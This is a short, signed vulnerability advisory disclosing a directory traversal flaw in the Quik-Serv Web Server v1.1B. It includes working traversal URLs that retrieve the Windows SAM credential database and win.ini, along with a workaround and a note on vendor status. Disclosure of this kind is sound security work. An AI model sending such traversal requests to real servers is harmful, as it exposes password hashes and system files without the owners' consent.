-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Quik-Serv Web Server v1.1B Arbitrary File Disclosure Abstract: Quik-Serv Web Server is a small webserver with CGI implemented into it. The server is vulnerable to a directory transversal which allows a remote user to display arbitrary files. Exploit: To display the SAM database http://server/../../../winnt/repair/sam To display the win.ini file http://server/../../../winnt/win.ini Workaround: Install packet filtering systems, wait for a fix, or don't even use the product. Vendor Status: The vendor has been contacted. But received no reply. - - - - - -- p0p t4rtz p0pt4rtz@hotmail.com NetCra$h Security Research Team http://www26.brinkster.com/netcrash/ -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPKtxlnZQKziJjiRfEQJ5tACgx8vvxarS1zSVcWTYIvmLlQRtNi4AoNiU xJfaNBOzgvm5Z+F582bJ9LJr =hCYD -----END PGP SIGNATURE----- _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx
